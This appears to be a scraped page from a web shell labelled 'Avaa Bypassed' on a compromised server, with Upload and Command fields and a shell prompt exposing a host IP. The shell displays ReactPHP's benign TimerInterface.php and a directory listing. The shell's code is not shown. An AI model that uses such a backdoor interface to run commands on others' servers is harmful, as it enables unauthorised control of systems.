404

[ Avaa Bypassed ]




Upload:

Command:

botdev@3.22.100.20: ~ $
<?php

namespace React\EventLoop;

interface TimerInterface
{
    /**
     * Get the interval after which this timer will execute, in seconds
     *
     * @return float
     */
    public function getInterval();

    /**
     * Get the callback that will be executed when this timer elapses
     *
     * @return callable
     */
    public function getCallback();

    /**
     * Determine whether the time is periodic
     *
     * @return bool
     */
    public function isPeriodic();
}

Filemanager

Name Type Size Permission Actions
Tick Folder 0755
Timer Folder 0755
ExtEvLoop.php File 5.8 KB 0644
ExtEventLoop.php File 7.34 KB 0644
ExtLibevLoop.php File 5.45 KB 0644
ExtLibeventLoop.php File 8.32 KB 0644
Factory.php File 1.19 KB 0644
LoopInterface.php File 18.22 KB 0644
SignalsHandler.php File 1.28 KB 0644
StreamSelectLoop.php File 8.68 KB 0644
TimerInterface.php File 492 B 0644